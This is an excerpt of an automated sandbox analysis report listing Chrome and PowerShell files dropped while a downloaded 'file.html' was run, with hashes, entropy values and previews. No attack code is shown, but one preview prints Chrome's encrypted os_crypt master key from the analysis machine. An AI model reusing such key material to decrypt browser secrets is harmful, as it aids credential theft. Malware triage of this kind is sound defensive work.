                                                                                                                                                                SHA-512:217716FDDFDE0494A7DB19D8B131218F28E7CCA1E4A0677E0EA61C9B5FA9C55F315E3D7DAABD58297CEBFF5D0945D425ADBDA4F099B9ED460A239A9668EBF4E4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .v}.x................4_IPH_DesktopTabGroupsNewGroup"..IPH_DesktopTabGroupsNewGroup.....4_IPH_LiveCaption...IPH_LiveCaption...f.7..................20_1_1...1..I=.................20_1_1...1V.e.................._.R...............021_download,3726782d-ba31-439b-8a16-6dc2b219aa18......$3726782d-ba31-439b-8a16-6dc2b219aa18............."....blob:null/a97e8999-2326-461e-9e14-63430d44f79c....file:///"*file:///C:/Users/user/Desktop/file.html*.0.B.J.P..Z.octet/streamb.octet/streamj.........r.........x...............................................J_.Am................4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage......4_IPH_DesktopTabGroupsNewGroup9u..;...............021_download,3726782d-ba31-439b-8a16-6dc2b219aa18......$3726782d-ba31-439b-8a16-6dc2b219aa18............."....blob:null/a97e8999-2326-461e-9e14-63430d44f79c....file:///"*file:///C:/Users/user/Desktop/file.html*.0.B.J.P..Z.octet/streamb.octet/streamjxt...8...C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.D.o.w.n.l.o.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.1892796085193345
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o03Oq2PlLN23iKKdKfrK+IFUtpvo15ZmwPvo2VkwOlLN23iKKdKfrUeLJ:w03Ovy5Kk23FUtpg3/PgA5L5Kk3J
                                                                                                                                                                MD5:470D395326BE25EA73C0D45E30585246
                                                                                                                                                                SHA1:64329E12B0AD1D098EFE2481904567F66F1D4A4A
                                                                                                                                                                SHA-256:610F61FC480617E1D659EC89909525FAD6581845F51F6354B7A8CAA6F823658D
                                                                                                                                                                SHA-512:FACDDE3FBFABDBA9A76D4E1DDDAD2117B5F68F9B5FFD946CDFCD97057D45802FFCC51728FB9A1A2286D58948AC5D70DAC17F61741B33FABFED7847FE0A5E965A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.815 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2021/08/16-19:10:31.816 1d70 Recovering log #3.2021/08/16-19:10:31.817 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.oldld (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.1892796085193345
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o03Oq2PlLN23iKKdKfrK+IFUtpvo15ZmwPvo2VkwOlLN23iKKdKfrUeLJ:w03Ovy5Kk23FUtpg3/PgA5L5Kk3J
                                                                                                                                                                MD5:470D395326BE25EA73C0D45E30585246
                                                                                                                                                                SHA1:64329E12B0AD1D098EFE2481904567F66F1D4A4A
                                                                                                                                                                SHA-256:610F61FC480617E1D659EC89909525FAD6581845F51F6354B7A8CAA6F823658D
                                                                                                                                                                SHA-512:FACDDE3FBFABDBA9A76D4E1DDDAD2117B5F68F9B5FFD946CDFCD97057D45802FFCC51728FB9A1A2286D58948AC5D70DAC17F61741B33FABFED7847FE0A5E965A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.815 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2021/08/16-19:10:31.816 1d70 Recovering log #3.2021/08/16-19:10:31.817 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):524
                                                                                                                                                                Entropy (8bit):3.8962231045990805
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:TRtqcJ8woBn3QfJPmtOl1m8Oc3mF2lHq2tmF2lHuBLD3QkPmto61m88BWX3mF2l6:ZJ8rg/Zp3iDgjoWXZmhrebtGj8D5xs
                                                                                                                                                                MD5:024BE5365AD718F1DC3D5B4248690712
                                                                                                                                                                SHA1:364C638D39A40812FB440F11A2D97AF653A3FCFD
                                                                                                                                                                SHA-256:4804EF1CC9CA7D3E62B3331A3CC4574009A2A650AC5B23AFCF26B4B0D97E97E1
                                                                                                                                                                SHA-512:9EE3E4E162AF7F7894A58615081C1BEFDA4C799AB28F2AE7D967EAE941DE79DDCE3446491735698D77924845E5BBDE7BADC7A71166D70BBE72785AA5695B4ABE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.15116920516014
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oqAq2PlLN23iKKdKfrzAdIFUtpvoLVXZmwPvoR6kwOlLN23iKKdKfrzILJ:wbvy5Kk9FUtpghX/PgR65L5Kk2J
                                                                                                                                                                MD5:0F5F2631F4F79BDBF3127288748E1702
                                                                                                                                                                SHA1:4B08FA92FE2D8CE6B829895C4ED2E1D6C18A80B7
                                                                                                                                                                SHA-256:FF1B5055E472545D7BF712A198D5C2C3F6E4E0EBFE03E7A06DD58B0455E97B9A
                                                                                                                                                                SHA-512:AE99C44D652632D32623F1CD52D901523EE7204E23680530B30D0126F8F942124A2B769A7A6C6FE42B0D6562226D69523C49537A2C73E6FDD8EEC9BDC4EAB8FF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.806 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/08/16-19:10:31.807 1d70 Recovering log #3.2021/08/16-19:10:31.808 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old44 (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.15116920516014
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oqAq2PlLN23iKKdKfrzAdIFUtpvoLVXZmwPvoR6kwOlLN23iKKdKfrzILJ:wbvy5Kk9FUtpghX/PgR65L5Kk2J
                                                                                                                                                                MD5:0F5F2631F4F79BDBF3127288748E1702
                                                                                                                                                                SHA1:4B08FA92FE2D8CE6B829895C4ED2E1D6C18A80B7
                                                                                                                                                                SHA-256:FF1B5055E472545D7BF712A198D5C2C3F6E4E0EBFE03E7A06DD58B0455E97B9A
                                                                                                                                                                SHA-512:AE99C44D652632D32623F1CD52D901523EE7204E23680530B30D0126F8F942124A2B769A7A6C6FE42B0D6562226D69523C49537A2C73E6FDD8EEC9BDC4EAB8FF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.806 1d70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/08/16-19:10:31.807 1d70 Recovering log #3.2021/08/16-19:10:31.808 1d70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):106
                                                                                                                                                                Entropy (8bit):3.138546519832722
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                                MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                                SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                                SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                                SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13
                                                                                                                                                                Entropy (8bit):2.873140679513133
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:mB4:mu
                                                                                                                                                                MD5:3A0E5D4F452CF99191634D0FFAB744A0
                                                                                                                                                                SHA1:F115BBB898EEFF640D8D19AD44A86C3FCDFFC0AD
                                                                                                                                                                SHA-256:B9D528D3AE283039F4700C7E4E790744C58A26353A91B536DD91CBA4F648A35F
                                                                                                                                                                SHA-512:87BF9DB30598EC454A02A4A32E5458E83870524D4AA497CB167C8A92B7521204B7B75E2BE18D61F9FBE51CA7DE8E35782AA65E6F6F11E4A4926A9B6C85D6528A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 92.0.4515.107
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77887
                                                                                                                                                                Entropy (8bit):6.0770047727207945
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:RFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:nQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:6CA853231667126C20A0DE78DBC4C67F
                                                                                                                                                                SHA1:CF571115A71A80F94BDA7775C2ABD11D3E1A515D
                                                                                                                                                                SHA-256:9901AB8F03221164C3DECFFF8CEDFBD56F4CF340F089A41DDD5E648630920407
                                                                                                                                                                SHA-512:3DA37F30598C8FC99D6047955BC926F0BE32E64A4B49B8A0797260617E338D9623BE622CCCA1DD62215750A04A4FC074A26984849D8FBAA1274B85C684E3A593
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local Statecr (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77886
                                                                                                                                                                Entropy (8bit):6.077006982775623
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:sFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:wQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:522D65461F6FB16D8FEE67BCAC8FB033
                                                                                                                                                                SHA1:0CEF645870F4BB6490A331EF3EBFF554373EB62E
                                                                                                                                                                SHA-256:5094EAC1E65BD4D9770B6C06FCC64952C9DDA210AE515D7603707029774E29CB
                                                                                                                                                                SHA-512:8963E3BFC14F0F020F877C4A3C9726D5B0E9DF0F794C1B20FE56BF4009E2F3DFE732ADCBC5B749524123D45A1BDF42E5CA60C52F5CBAA70D31373AB9E8E88022
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache1. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):111472
                                                                                                                                                                Entropy (8bit):3.762200965870132
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:4hnDwMoWkNJRGhYyY4MvX9ip/y6pJe3u0H4E5QASmzTColkGSKwXsuR9AjXc2CyK:6mYGuJGL/Elve2dUwhxKEyVTa
                                                                                                                                                                MD5:E7302C0B7B18E9DA2D02197EDCFB2BD1
                                                                                                                                                                SHA1:A8080458659A5D53222A36F461782A19D7C81A69
                                                                                                                                                                SHA-256:1311E2A03F008B53DE6B2E311F4B39A6AA3FE1C7C0A97D0DE0622E3A0A3A68A6
                                                                                                                                                                SHA-512:471E74DA76D33C77D4A7E735FD4105F9CF61607F37BE4CA179BEC9FDD9692EBBBB3C575BC46A1FA47B8B8BF9D1C94B1B86A4D9AA2D31FD46BAFCD511D1F22891
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache\b (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):103220
                                                                                                                                                                Entropy (8bit):3.7617699118143513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:whnDwMoWkNJRVYnvX9ip/y6pJe3u0hE5QASmNColkGSfHR9AjV2CWKwFyxXPvklY:QYG8EGL/Elve2ahxKeyVTm
                                                                                                                                                                MD5:EEEC6F847466324F8C09F44A6EAFF319
                                                                                                                                                                SHA1:643D2BBA0448068785F58988968D5C4F5C9B76CD
                                                                                                                                                                SHA-256:2A1D20317DDA0D20C7FDA014AAE308F409EDC8E0CFF1DC6B2DE1DFB209EB4AB7
                                                                                                                                                                SHA-512:324CA95F02454A3692F6EA3454822B97CE260C0B56C6E9A1077DAA8DF7ACD90EFC3BEBB42E5DEF5350BD19F62B4421792CB77D3E4B65DF9A2C49ECEB45014852
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cachel (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):110732
                                                                                                                                                                Entropy (8bit):3.7624853019517377
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OhnDwMoWkNJRGhYyY4MvX9ip/y6pJe3u0H4E5QASmzTColkGSKwXsuR9AjXc2CWT:0mYGuEGL/Elve2dUwhxKEyVTK
                                                                                                                                                                MD5:7171A19C7D99F78A95AC278D2403AD29
                                                                                                                                                                SHA1:35EB15DEA17948C329567382A136B3D6BC78453E
                                                                                                                                                                SHA-256:15050949C383DF14BFDA93135CA3CA1CE0B1CA96F113DF5F85F613B8105F49CE
                                                                                                                                                                SHA-512:2727DA95ADA8E29E6EACB571D7A444F84C94F9767632D2ECDB43786A4C4E3C1C22A167F6D0F8702F792D143B366B43F903D0B20280D2D274E990128C0E04763E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.5490452575616273
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TL6ErbXaFpEO5bNmISHnCWm06UwcQ5n5fB:TOErLOpEO5J/Knvm7U1QpB
                                                                                                                                                                MD5:7F20CE947282339C895303C49B3DFE93
                                                                                                                                                                SHA1:6FFC90A15813599BD8A24366AE9305130C965E0D
                                                                                                                                                                SHA-256:88EEA6964B1637FD157CE8E85A26DE0A96849F112809C0705F6CACE0F1B34706
                                                                                                                                                                SHA-512:358CC24210BC4DB01C9A8E11264206943094B4AB2F79A851F97A4BC4BCB72C053BE727A54B20F58BE9E185DE35C5DDAA4CD02C079FD95716EE602CE0FB4FA183
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\a1f93e98-593c-4e9c-9f43-604a206dcbc1.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):77887
                                                                                                                                                                Entropy (8bit):6.0770047727207945
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:RFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:nQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:6CA853231667126C20A0DE78DBC4C67F
                                                                                                                                                                SHA1:CF571115A71A80F94BDA7775C2ABD11D3E1A515D
                                                                                                                                                                SHA-256:9901AB8F03221164C3DECFFF8CEDFBD56F4CF340F089A41DDD5E648630920407
                                                                                                                                                                SHA-512:3DA37F30598C8FC99D6047955BC926F0BE32E64A4B49B8A0797260617E338D9623BE622CCCA1DD62215750A04A4FC074A26984849D8FBAA1274B85C684E3A593
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"91.0.4472.77"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.629166233160556e+12,"network":1.629133834e+12,"ticks":7317648369.0,"uncertainty":3792367.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABBQ7WxpM2gT7fMNkY5iRxkAAAAAAIAAAAAABBmAAAAAQAAIAAAALDWDwoLRYqp0NkiPsTxUN2QcOPsitaJrdacpo+ULE2PAAAAAA6AAAAAAgAAIAAAAOIeKQBWbQSCqXv1OSNS2lIZGHfAdJRwvbkapN4/FWvwMAAAAPz8I/w07KQb4Ut8ObsBGVgFwbuU88R362cCGZpNEtOEILJDMaKWOA4Y9ejBRTt5kEAAAADq8RkIezfgqGPgEaEMkhoGd9qhyBeyucXcRUPEI7mgYIxaDt8C5FJrjkEhV5EOUcUmR2SCzqYelImLnfOlbhRQ"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13267638417137193"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\c08e7180-08d9-4f49-9739-4eb937866196.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73534
                                                                                                                                                                Entropy (8bit):6.04489331617895
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:ZFpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:vQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:16476B7C8F42F63A1B939BA059829C0F
                                                                                                                                                                SHA1:1E84623FDA194E622A8066C7FC08ECAC08B55297
                                                                                                                                                                SHA-256:3DD82D4326560DA3FB63A67541B6CCE7AF598DDD1B32DA1AF5D3A47E96FCCAFF
                                                                                                                                                                SHA-512:F5E8CB9F2F20B248F293FF40FF700C2EEF33D8A5F674B7575DA0D63467A5E486A106B28FF2A52EF1AC31D7689C261407305445A6F8CBCDD2CAF03061037F1DE4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):64
                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:NlllulLGc:NllUy
                                                                                                                                                                MD5:5B19D97A5677948B3FDFFA587656E174
                                                                                                                                                                SHA1:F2D77C0FB4AF946A6B4F258B86BD7ABF1937DC95
                                                                                                                                                                SHA-256:FE8C19E63973FC5815EBE0E7FB59FD81A19FB0F95A8F434D26D161687EB566F4
                                                                                                                                                                SHA-512:2FF4CA647E1F4AF9B1CB9A4A92E31821B3C38591B324179531EE1C54AE9B63E0C86F4AC09435E2150591167E3DCD371566F0644EAD7E5438868C2A2224C20F27
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: @...e.................................Z#.............@..........
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\29bbe3ee-88b3-44fb-8b00-5f220d470282.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):109782
                                                                                                                                                                Entropy (8bit):7.997374148911505
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:mK4nR4F2dvWPykEr2a4pe2N+OCEYmtKjog6G3cqu9k:r4R9x4peYFCEHo735uk
                                                                                                                                                                MD5:CEF2A4964673E37281DA19C4FF2E6FC5
                                                                                                                                                                SHA1:57AFACC58857D37DC70908AE22C9A2F2EE74A701
                                                                                                                                                                SHA-256:7CFE8628CC9748A79692F797F893F5CF7F523DF57E06E5089F42886DF2ADED60
                                                                                                                                                                SHA-512:1BDC703B4E129ADC743823088D86EBA11970A45378D472252F0EFA2A08FB31E373E936B3ECB213F98469CC192C9CD0D11AB6BF922C5DB565D551A328637BC8BC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4e472fc3-9f95-4aec-b2dd-a79a88941aaf.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):30948
                                                                                                                                                                Entropy (8bit):7.99105089802474
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:768:jElAfPryn5QzShaPuChbhFbHRu/llKGr7J9FwyIlWg+S3:jElAfzyneSMPuKbvzUllKGzFDOWgv
                                                                                                                                                                MD5:7F0FCE2F184F63FED8E9929FB106C282
                                                                                                                                                                SHA1:0582EB5BFC7FCCCC1C77A860F00E351E61F5DC67
                                                                                                                                                                SHA-256:7C33F333216849E50AFC9550DA7DA4450D221B837340716ACCEE3766FFD4A62B
                                                                                                                                                                SHA-512:AD1CD5B804C08C4C25BD6F97153D3371156848A83682DF1829B0B113B60ED0B01D67B5CD737CB414C8B825E12C7E0D6B5F9B338F4AF7FC82BE8AAF4CA8E279BA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5004a1ee-4037-4bb8-8420-714886724c59.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):101891
                                                                                                                                                                Entropy (8bit):7.9971613680976565
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:Xs4McBbhITdJs7qJdKpJcKdNd+HyEzEcl6dr:X7Bb4dJsOPKpJrv4tTl6dr
                                                                                                                                                                MD5:173CA02E5B06065771DEB2F28E4E5A9E
                                                                                                                                                                SHA1:20F1774FB280C94C13082A255C27D7A786EFD5C7
                                                                                                                                                                SHA-256:634557AE2916F2FAA0CBF2557F8F96E26845ABE94D2784FD73B169EC5618B186
                                                                                                                                                                SHA-512:D947E3ED56BE1F3C668943E8F066F39650D2E0D76BF64BAD167E100B8B1066B88D8E851346AFBD9777E90445F41C5108A0A2F1514A3F28F02D4EC39978121E71
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\SortingLshClusters
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):33872
                                                                                                                                                                Entropy (8bit):2.0569169245781995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:SuvCanrfpcIQPDdn6ZElJghag9exwM7FHjwvZJiSHqLg9wR7e9AncnT5S7QEdZ4h:g1Qhh9eKKLg9wR7aAWZ3h
                                                                                                                                                                MD5:0F63C5027C2425412AFDE4B88D9BDDE8
                                                                                                                                                                SHA1:98457E193D6DD71525AEB3F48CD13B6455C35B9F
                                                                                                                                                                SHA-256:C8232B6128DC4759DB73245BD110589BA2D910DB20FB6367AFB6E6D9E4C1F54B
                                                                                                                                                                SHA-512:9C98F0F257456B542EF0177F513F07440165468DB4B01342A009210554079186FC03E61E0BF92ABED35A51B6578A263197A9061F699EF960CDEE85553D0BCDEE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\_metadata\verified_contents.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1765
                                                                                                                                                                Entropy (8bit):6.014705394789547
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:p/henDcwAakDUSy+T5V3uVTuCojVkS4FkZXco:RcDPAa8y+TbpjVyFiMo
                                                                                                                                                                MD5:8B845471B314D55AE06FBF882AB8F776
                                                                                                                                                                SHA1:190ECAEAF30450A3130E775C0B4B92B90F11B24B
                                                                                                                                                                SHA-256:992660E19AE360708B225EEAAE07D9A8BCE2A5AC2CE2822AAEC9A8D9945F0F2D
                                                                                                                                                                SHA-512:2ED7B15600BBC2F5BDF5A55CA589A49C2C33DAD373DFCD17286A6BADF1F2A8457DE516D5770DD68DBA2102875C2D4B839C0E5EEE1B6F673B695E012775C116D5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\manifest.fingerprint
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):66
                                                                                                                                                                Entropy (8bit):3.922738348156206
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Shj4WEB8HYXAAhGfyn:Shj2XAAhGK
                                                                                                                                                                MD5:AA9B8B29E3D553EB48973A7FF3D5FEA5
                                                                                                                                                                SHA1:D8F0A1D39C59B4C45406E1481910992F7C23192B
                                                                                                                                                                SHA-256:60D8DD0ECEF5BC2E653E1CE906D4BAF07D56491B39B29F051F414288A84720C3
                                                                                                                                                                SHA-512:A73F7A352CE648BF40EEEB27E3AB3E6FCBF54E7DCE7F5BCD656205B7DBCF00E5A1A1E48B375EA82D4CE7CD7416142E04C22D346566CBF9C661C29377784C6E0E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 1.b4ddbdce4f8d5c080328aa34c19cb533f2eedec580b5d97dc14f74935e4756b7
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\manifest.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):122
                                                                                                                                                                Entropy (8bit):4.549343645753808
                                                                                                                                                                Encrypted:false
